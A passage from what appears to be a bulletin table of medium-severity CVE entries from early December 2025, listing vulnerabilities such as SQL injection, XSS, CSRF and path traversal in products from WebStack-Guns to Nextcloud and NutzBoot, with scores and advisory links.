| jsnjfz--WebStack-Guns | A vulnerability was determined in jsnjfz WebStack-Guns 1.0. This vulnerability affects unknown code of the file src/main/java/com/jsnjfz/manage/core/common/constant/factory/PageFactory.java. Executing manipulation of the argument sort can lead to sql injection. It is possible to launch the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13811 | VDB-333821 | jsnjfz WebStack-Guns PageFactory.java sql injection VDB-333821 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692084 | WebStack-Guns Project WebStack-Guns 1.0 SQL Injection https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-SQLInjection-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-SQLInjection-1/report.md#proof-of-concept |
| jsnjfz--WebStack-Guns | A vulnerability was found in jsnjfz WebStack-Guns 1.0. This affects the function renderPicture of the file src/main/java/com/jsnjfz/manage/modular/system/controller/KaptchaController.java. Performing manipulation results in path traversal. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 5.3 | CVE-2025-13810 | VDB-333820 | jsnjfz WebStack-Guns KaptchaController.java renderPicture path traversal VDB-333820 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692080 | WebStack-Guns Project (GitHub organization jsnjfz) WebStack-Guns 1.0 (latest master) Path Traversal / Arbitrary File Read (CWE-22) https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-PathTraversal-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/WebStack-Guns-PathTraversal-1/report.md#proof-of-concept |
| kaushikankrani--Hide Categories Or Products On Shop Page | The Hide Categories Or Products On Shop Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7. This is due to missing or incorrect nonce validation on the save_data_hcps() function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12128 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b649266a-6a9a-4d2e-9a82-2335e96bfe0d?source=cve https://wordpress.org/plugins/hide-categories-or-products-on-shop-page/ |
| KDE--KDE Connect information-exchange protocol | In the KDE Connect information-exchange protocol before 2025-04-18, a packet can be crafted to temporarily change the displayed information about a device, because broadcast UDP is used. This affects KDE Connect before 1.33.0 on Android, KDE Connect before 25.04 on desktop, KDE Connect before 0.5 on iOS, Valent before 1.0.0.alpha.47, and GSConnect before 59. | 2025-12-05 | 4.3 | CVE-2025-32900 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-2.txt |
| KDE--KDE Connect protocol | The KDE Connect protocol 8 before 2025-11-28 does not correlate device IDs across two packets. This affects KDE Connect before 25.12 on desktop, KDE Connect before 0.5.4 on iOS, KDE Connect before 1.34.4 on Android, GSConnect before 68, and Valent before 1.0.0.alpha.49. | 2025-12-05 | 4.7 | CVE-2025-66270 | https://invent.kde.org/network/kdeconnect-kde/-/commit/4e53bcdd5d4c28bd9fefd114b807ce35d7b3373e https://invent.kde.org/network/kdeconnect-android/-/commit/675d2d24a1eb95d15d9e5bde2b7e2271d5ada6a9 https://invent.kde.org/network/kdeconnect-ios/-/commit/6c003c22d04270cabc4b262d399c753d55cf9080 https://github.com/GSConnect/gnome-shell-extension-gsconnect/commit/a38246deec0af50ae218cdc51db32cdd7eb145e3 https://github.com/andyholmes/valent/commit/85f773124a67ed1add79e7465bb088ec667cccce https://kde.org/info/security/advisory-20251128-1.txt |
| KDE--KDE Connect verification-code protocol | The KDE Connect verification-code protocol before 2025-04-18 uses only 8 characters and therefore allows brute-force attacks. This affects KDE Connect before 1.33.0 on Android, KDE Connect before 25.04 on desktop, KDE Connect before 0.5 on iOS, Valent before 1.0.0.alpha.47, and GSConnect before 59. | 2025-12-05 | 4.7 | CVE-2025-32898 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-3.txt |
| KDE--KDEConnect | In KDE Connect before 1.33.0 on Android, a packet can be crafted that causes two paired devices to unpair. Specifically, it is an invalid discovery packet sent over broadcast UDP. | 2025-12-05 | 4.3 | CVE-2025-32899 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-1.txt |
| KDE--KDEConnect | In KDE Connect before 1.33.0 on Android, malicious device IDs (sent via broadcast UDP) could cause an application crash. | 2025-12-05 | 4.3 | CVE-2025-32901 | https://kdeconnect.kde.org https://kde.org/info/security/advisory-20250418-4.txt |
| ketr--JEPaaS | A vulnerability was determined in ketr JEPaaS up to 7.2.8. Affected by this vulnerability is an unknown functionality of the file /je/load. This manipulation of the argument Authorization causes improper authorization. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-05 | 6.3 | CVE-2025-14088 | VDB-334478 | ketr JEPaaS load improper authorization VDB-334478 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #695316 | Beijing Kaite Weiye Science and Technology Co.,Ltd. JEPaaS JEPaaSV7.2.8 vertical privilege escalation vulnerability https://github.com/zhangbuneng/The-Jepaas-platform-has-a-vertical-privilege-escalation-vulnerability./issues/1 |
| kevindees--FitVids for WordPress | The FitVids for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-05 | 4.4 | CVE-2025-12124 | https://www.wordfence.com/threat-intel/vulnerabilities/id/063a245d-bd9e-49ac-bdf0-549a25eba9fe?source=cve https://wordpress.org/plugins/fitvids-for-wordpress/ |
| krupenik--RevInsite | The RevInsite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `token` parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13863 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c52de26a-d52c-4b2e-8e51-731115d29bd0?source=cve https://plugins.trac.wordpress.org/browser/revinsite/trunk/revinsite.php#L25 https://plugins.trac.wordpress.org/browser/revinsite/tags/1.1.0/revinsite.php#L25 |
| ksakai--Yet Another WebClap for WordPress | The Yet Another WebClap for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'text' parameter of the webclap_button shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13857 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ca50e5e7-be46-40f1-9782-a72ca8ab7e9a?source=cve https://plugins.trac.wordpress.org/browser/yet-another-webclap-for-wordpress/trunk/yawebclap.php#L28 https://plugins.trac.wordpress.org/browser/yet-another-webclap-for-wordpress/tags/0.2/yawebclap.php#L28 |
| LINE Corporation--Central Dogma | Central Dogma versions before 0.78.0 contain an Open Redirect vulnerability that allows attackers to redirect users to untrusted sites via specially crafted URLs, potentially facilitating phishing attacks and credential theft. | 2025-12-04 | 6.1 | CVE-2025-11222 | https://github.com/line/centraldogma/security/advisories/GHSA-4hr2-xf7w-jf76 |
| linkwhspr--Link Whisper Free | The Link Whisper Free plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the type parameter in all versions up to, and including, 0.8.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-06 | 6.1 | CVE-2025-11263 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7e0cbef8-223a-44c0-a07f-28de2670da99?source=cve https://plugins.trac.wordpress.org/changeset/3401477/link-whisper/trunk/core/Wpil/Report.php |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'search' parameter in all versions up to, and including, 1.4.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-02 | 4.9 | CVE-2025-13090 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d0fbf502-2dfb-49e5-94a6-1525aabc08c1?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405484%40wpdirectorykit&new=3405484%40wpdirectorykit&sfp_email=&sfph_mail= |
| macrozheng--mall-swarm | A security vulnerability has been detected in macrozheng mall-swarm up to 1.0.3. Affected is the function delete of the file /member/readHistory/delete. Such manipulation of the argument ids leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 5.4 | CVE-2025-14016 | VDB-334257 | macrozheng mall-swarm delete improper authorization VDB-334257 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694797 | mall-swarm <=1.0.3 Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/17 |
| Mattermost--Mattermost | Mattermost versions 11.0.x <= 11.0.2, 10.12.x <= 10.12.1, 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to validate user permissions when deleting comments in Boards, which allows an authenticated user with the editor role to delete comments created by other users. | 2025-12-01 | 4.3 | CVE-2025-12756 | https://mattermost.com/security-updates |
| Medtronic--CareLink Network | Medtronic CareLink Network allows an unauthenticated remote attacker to initiate a request for security questions to an API endpoint that could be used to determine a valid user account. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 5.3 | CVE-2025-12994 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| Medtronic--CareLink Network | Medtronic CareLink Network allows a local attacker with access to log files on an internal API server to view plaintext passwords from errors logged under certain circumstances. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 4.1 | CVE-2025-12996 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| michael_j_reid--Weekly Planner | The Weekly Planner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-05 | 4.4 | CVE-2025-12186 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1cd2d269-5af2-40ab-b424-505c95c56688?source=cve https://wordpress.org/plugins/weekly-planner/#description |
| michaelcole1991--Extra Post Images | The Extra Post Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the extra-images shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13856 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5fbb963-f89d-4037-9456-8587bcf5d620?source=cve https://plugins.trac.wordpress.org/browser/extra-post-images/trunk/epi.php#L92 https://plugins.trac.wordpress.org/browser/extra-post-images/tags/1.0/epi.php#L92 https://plugins.trac.wordpress.org/browser/extra-post-images/tags/1.0/epi.php#L101 |
| Microsoft--Microsoft Edge (Chromium-based) | User interface (ui) misrepresentation of critical information in Microsoft Edge for iOS allows an unauthorized attacker to perform spoofing over a network. | 2025-12-05 | 4.3 | CVE-2025-62223 | Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability |
| MiR--Robot | Open redirect in the web server component of MiR Robot and Fleet software allows a remote attacker to redirect users to arbitrary external websites via a crafted parameter, facilitating phishing or social engineering attacks. | 2025-12-01 | 6.1 | CVE-2025-13819 | https://mobile-industrial-robots.com/security-advisories/cve-2025-13819-open-redirect https://supportportal.mobile-industrial-robots.com/documentation/mir-cybersecurity-guide/mir-cybersecurity-guide/ |
| missi--Jabbernotification | The Jabbernotification plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the admin.php PATH_INFO in all versions up to, and including, 0.99-RC2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13622 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8e9a872d-575c-455c-8f26-709878817ae0?source=cve https://wordpress.org/plugins/jabberbenachrichtigung/ https://plugins.trac.wordpress.org/browser/jabberbenachrichtigung/tags/0.99-RC2/jabbernotification.php#L85 https://plugins.trac.wordpress.org/browser/jabberbenachrichtigung/trunk/jabbernotification.php#L85 |
| monkeyboz--Quantic Social Image Hover | The Quantic Social Image Hover plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-13360 | https://www.wordfence.com/threat-intel/vulnerabilities/id/43a237fd-5d3a-47fb-bacf-ceb5eeaa8bbb?source=cve https://plugins.trac.wordpress.org/browser/tw-image-hover-share/trunk/tw-image-hover.php#L103 https://plugins.trac.wordpress.org/browser/tw-image-hover-share/tags/1.0.8/tw-image-hover.php#L103 |
| moxi159753--Mogu Blog v2 | A weakness has been identified in moxi159753 Mogu Blog v2 up to 5.2. The affected element is an unknown function of the file /file/pictures. This manipulation of the argument filedatas causes unrestricted upload. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13815 | VDB-333824 | moxi159753 Mogu Blog v2 pictures unrestricted upload VDB-333824 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692106 | moxi159753 mogu_blog_v2 <=v5.2 Unrestricted Upload of File with Dangerous Type https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-unrestricted_upload-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-unrestricted_upload-1/report.md#proof-of-concept |
| moxi159753--Mogu Blog v2 | A security vulnerability has been detected in moxi159753 Mogu Blog v2 up to 5.2. The impacted element is the function FileOperation.unzip of the file /networkDisk/unzipFile of the component ZIP File Handler. Such manipulation of the argument fileUrl leads to path traversal. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 6.3 | CVE-2025-13816 | VDB-333825 | moxi159753 Mogu Blog v2 ZIP File unzipFile FileOperation.unzip path traversal VDB-333825 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692107 | moxi159753 mogu_blog_v2 <=v5.2 Path Traversal / Zip Slip https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-zip_slip-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-zip_slip-1/report.md#proof-of-concept |
| moxi159753--Mogu Blog v2 | A vulnerability was identified in moxi159753 Mogu Blog v2 up to 5.2. This issue affects some unknown processing of the file /storage/ of the component Storage Management Endpoint. The manipulation leads to missing authorization. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitability is assessed as difficult. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-01 | 5.6 | CVE-2025-13813 | VDB-333822 | moxi159753 Mogu Blog v2 Storage Management Endpoint storage authorization VDB-333822 | CTI Indicators (IOB, IOC, IOA) Submit #692104 | moxi159753 mogu_blog_v2 <=v5.2 Broken Access Control / Missing Authorization https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/mogu_blog_v2-broken_access_control-1/report.md#proof-of-concept |
| mrdenny--Time Sheets | The Time Sheets plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.3. This is due to missing or incorrect nonce validation on several endpoints. This makes it possible for unauthenticated attackers to perform a variety of actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-10055 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6d8b57de-d02c-40c0-abdb-ff490bcf429e?source=cve https://wordpress.org/plugins/time-sheets/ |
| mxchat--MxChat AI Chatbot for WordPress | The MxChat - AI Chatbot for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.5 via upload filenames. This makes it possible for unauthenticated attackers to extract session values that can subsequently be used to access conversation data. | 2025-12-03 | 5.3 | CVE-2025-12585 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cf1a90d-6157-40e7-aed8-4d18bc22432d?source=cve https://plugins.trac.wordpress.org/browser/mxchat-basic/trunk/includes/class-mxchat-integrator.php#L107 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406402%40mxchat-basic&new=3406402%40mxchat-basic&sfp_email=&sfph_mail= |
| n/a--Blood Bank Management System 1.0 | A session fixation vulnerability exists in Blood Bank Management System 1.0 in login.php that allows an attacker to set or predict a user's session identifier prior to authentication. When the victim logs in, the application continues to use the attacker-supplied session ID rather than generating a new one, enabling the attacker to hijack the authenticated session and gain unauthorized access to the victim's account. | 2025-12-01 | 6.1 | CVE-2025-63529 | https://github.com/Shridharshukl/Blood-Bank-Management-System https://drive.google.com/file/d/12yeOXW_sN69QjsQtW0_k9AGqozi1s0di/view?usp=sharing https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63529.md |
| n/a--JIZHICMS | A vulnerability was found in JIZHICMS up to 2.5.5. Impacted is the function commentlist of the file /index.php/admins/Comment/addcomment.html of the component Add Display Name Field. Performing manipulation of the argument aid/tid results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14011 | VDB-334252 | JIZHICMS Add Display Name Field addcomment.html commentlist sql injection VDB-334252 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694644 | Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 SQL Injection Submit #694645 | Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 SQL Injection (Duplicate) https://github.com/24-2021/vul2/blob/main/jizhicms%3DV2.5.5-addcomment.html-aid%20parameter-SQL%20injection/jizhicms-addcomment.html-aid%20parameter-SQL%20injection.md |
| n/a--JIZHICMS | A vulnerability was determined in JIZHICMS up to 2.5.5. The affected element is the function deleteAll/findAll/delete of the file /index.php/admins/Comment/deleteAll.html of the component Batch Delete Comments. Executing manipulation can lead to sql injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 4.7 | CVE-2025-14012 | VDB-334253 | JIZHICMS Batch Delete Comments deleteAll.html delete sql injection VDB-334253 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694647 | Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 SQL Injection https://github.com/24-2021/vul2/blob/main/jizhicms%3DV2.5.5-deleteAll.html-data%20parameter-SQL%20injection/jizhicms%3DV2.5.5-deleteAll.html-data%20parameter-SQL%20injection.md |
| n/a--KerOS prior to 5.12 | Due to a firewall misconfiguration, Kerlink devices running KerOS prior to 5.12 incorrectly accept specially crafted UDP packets. This allows an attacker to bypass the firewall and access UDP-based services that would otherwise be protected. | 2025-12-01 | 5.3 | CVE-2024-32388 | https://www.bdosecurity.de/en-gb/advisories/cve-2024-32388 https://keros.docs.kerlink.com/security/security_advisories_kerOS5 |
| n/a--KerOS prior to version 5.10 | Kerlink gateways running KerOS prior to version 5.10 expose their web interface exclusively over HTTP, without HTTPS support. This lack of transport layer security allows a man-in-the-middle attacker to intercept and modify traffic between the client and the device. | 2025-12-01 | 6.8 | CVE-2024-32384 | https://keros.docs.kerlink.com/security/security_advisories_kerOS5 https://www.bdosecurity.de/en-gb/advisories/cve-2024-32384 |
| n/a--nocobase | A vulnerability was detected in nocobase up to 1.9.4/2.0.0-alpha.37. The affected element is an unknown function of the file nocobase\packages\core\auth\src\base\jwt-service.ts of the component JWT Service. The manipulation of the argument API_KEY results in use of hard-coded cryptographic key . The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is described as difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-02 | 5.6 | CVE-2025-13877 | VDB-334033 | nocobase JWT Service jwt-service.ts hard-coded key VDB-334033 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692205 | https://github.com/nocobase https://github.com/nocobase/nocobase Latest Authorization Bypass https://gist.github.com/H2u8s/f3ede60d7ecfe598ae452aa5a8fbb90d |
| natambu--Twitscription | The Twitscription plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the admin.php PATH_INFO in all versions up to, and including, 0.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-05 | 6.1 | CVE-2025-13623 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8f6e7756-d8cc-4380-a93e-47d7916a5f7b?source=cve https://wordpress.org/plugins/twitscription/ https://plugins.trac.wordpress.org/browser/twitscription/tags/0.1.1/twitscription.php#L101 https://plugins.trac.wordpress.org/browser/twitscription/trunk/twitscription.php#L101 |
| nedwp--Feedback Modal for Website | The Feedback Modal for Website plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'handle_export' function in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to export all feedback data in CSV or JSON format via the 'export_data' parameter. | 2025-12-05 | 5.3 | CVE-2025-13528 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3341c29-a69e-4618-a8a5-11f4141ff88f?source=cve https://plugins.trac.wordpress.org/browser/feedback-modal-for-website/trunk/inc/admin/main.php#L1011 https://plugins.trac.wordpress.org/browser/feedback-modal-for-website/tags/1.0.1/inc/admin/main.php#L1011 |
| Nextcloud--Nextcloud | Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, and 32.0.1 allows attackers to execute arbitrary JavaScript in the context of a user's browser via a crafted PDF file to viewer.html. This issue is related to CVE-2024-4367, but the root cause of this Nextcloud issue is that the product exposes executable example code on a same-origin basis. | 2025-12-04 | 6.4 | CVE-2025-59788 | https://nextcloud.com https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-003/ https://github.com/nextcloud/security-advisories/security/advisories/GHSA-24wp-p865-7j4r |
| nextcloud--security-advisories | Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.6 and 0.9.3, a malicious user was able to create their own table and then move a column to a victims table. This vulnerability is fixed in 0.8.6 and 0.9.3. | 2025-12-05 | 6.3 | CVE-2025-66551 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-w787-vwqp-8wr7 https://github.com/nextcloud/tables/pull/1810 https://github.com/nextcloud/tables/commit/39f24a62fb41fd7a8bda65325f8bbafdc91c731c https://hackerone.com/reports/3137895 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server and Server Enterprise prior to 31.0.12 and 32.0.3, a missing sanitization allowed malicious users to circumvent the content security policy when a malicious user manages to trick a user it viewing an uploaded SVG outside of the Nextcloud Servers web page. | 2025-12-05 | 5.4 | CVE-2025-66512 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-qcw2-p26m-9gc5 https://github.com/nextcloud/viewer/pull/3023 https://github.com/nextcloud/viewer/commit/5044a27d61bc40c0f134298d36af91f865335b63 https://hackerone.com/reports/3357808 |
| nextcloud--security-advisories | Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.17 and 5.2.4, when a malicious user creates a calendar event with a crafted attachment that links to a download link of a file on the same Nextcloud server, the file would be downloaded without the user confirming the action. This vulnerability is fixed in 4.7.17 and 5.2.4. | 2025-12-05 | 5.7 | CVE-2025-66550 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-f29c-ppmv-8mcv https://github.com/nextcloud/calendar/pull/6971 https://github.com/nextcloud/calendar/commit/63a6c398db01391eb9fd5297a0d4c3d6e614f769 https://hackerone.com/reports/3112033 |
| nextcloud--security-advisories | Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.14.6 and 1.15.2, a bug in the permission logic allowed users with "Can share" permission to modify the permissions of other recipients. This vulnerability is fixed in 1.14.6 and 1.15.2. | 2025-12-05 | 5.4 | CVE-2025-66557 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wwr8-hx9g-rjvv https://github.com/nextcloud/deck/pull/7131 https://github.com/nextcloud/deck/commit/f1da8b30a455f02373d44154da04494c949a95ae https://hackerone.com/reports/3247499 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1 and Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, contacts search allowed to retrieve personal data of other users (emails, names, identifiers) without proper access control. This allows an authenticated user to retrieve information about accounts that are not related or added as contacts. | 2025-12-05 | 4.5 | CVE-2025-66510 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-495w-cqv6-wr59 https://github.com/nextcloud/server/pull/55657 https://github.com/nextcloud/server/commit/e4866860cbf24a746eb8a125587262a4c8831c57 |
| nextcloud--security-advisories | Nextcloud Calendar is a calendar app for Nextcloud. Prior to 6.0.3, the Calendar app generates participant tokens for meeting proposals using a hash function, allowing an attacker to compute valid participant tokens, which allowed them to request details and submit dates in meeting proposals. The tokens are not purely random generated. This vulnerability is fixed in 6.0.3. | 2025-12-05 | 4.8 | CVE-2025-66511 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-whm3-vv55-gf27 https://github.com/nextcloud/calendar/pull/7659 https://github.com/nextcloud/calendar/commit/8de14ae87f321f5f09280d9895a27d54d24f33fb https://hackerone.com/reports/3385434 |
| nextcloud--security-advisories | Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.9, 0.9.6, and 1.0.1, the information which table (numeric ID) is shared with which groups or users and the respective permissions was not limited to privileged users. This vulnerability is fixed in 0.8.9, 0.9.6, and 1.0.1. | 2025-12-05 | 4.3 | CVE-2025-66513 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2cwj-qp49-4xfw https://github.com/nextcloud/tables/pull/2148 https://github.com/nextcloud/tables/commit/b92b9560b1e70a02b103a7aeb9e22e2ab5231873 https://hackerone.com/reports/3334165 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server and Enterprise Server prior to 31.0.1, non-privileged users can modify tags on files they should not have access to via bulk tagging. This vulnerability is fixed in 31.0.1. | 2025-12-05 | 4.3 | CVE-2025-66547 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-hq6c-r898-fgf2 https://github.com/nextcloud/server/issues/51247 https://github.com/nextcloud/server/pull/51288 https://github.com/nextcloud/server/commit/b44f1568f2dc97c746281d99e2342ad679e3d8a9 https://hackerone.com/reports/3040887 |
| nextcloud--security-advisories | Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server and Enterprise Server prior to 30.0.9 and 31.0.1, incorrect path handling with groupfolders caused the admin_audit app to not properly log all actions on files and folders inside groupfolders. This vulnerability is fixed in Nextcloud Server and Enterprise Server prior to 30.0.9 and 31.0.1. | 2025-12-05 | 4.3 | CVE-2025-66552 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-ww9m-f8j4-jj9x https://github.com/nextcloud/server/pull/50992 https://github.com/nextcloud/server/commit/7cc005c43c72bc384848cf8cb851895827c412f6 https://hackerone.com/reports/2890071 |
| nextcloud--security-advisories | Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.8.7 and 0.9.4, authenticated users were able to view meta data of columns in other tables of the Tables app by modifying the numeric ID in a request. This vulnerability is fixed in 0.8.7 and 0.9.4. | 2025-12-05 | 4.3 | CVE-2025-66553 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-p53h-6294-crjw https://github.com/nextcloud/tables/pull/1891 https://github.com/nextcloud/tables/commit/e975f5bfedb6922f04cdd236cde4e26067fe064e https://hackerone.com/reports/3138721 |
| nutzam--NutzBoot | A security flaw has been discovered in nutzam NutzBoot up to 2.6.0-SNAPSHOT. The impacted element is an unknown function of the file nutzboot-demo/nutzboot-demo-simple/nutzboot-demo-simple-web3j/src/main/java/io/nutz/demo/simple/module/EthModule.java of the component Ethereum Wallet Handler. Performing manipulation results in information disclosure. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. | 2025-12-01 | 4.3 | CVE-2025-13804 | VDB-333814 | nutzam NutzBoot Ethereum Wallet EthModule.java information disclosure VDB-333814 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692050 | NutzBoot project NutzBoot NutzBoot 2.6.0-SNAPSHOT Information Disclosure (Wallet password leakage) https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-InfoLeak-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-InfoLeak-1/report.md#vulnerability-details-and-poc |
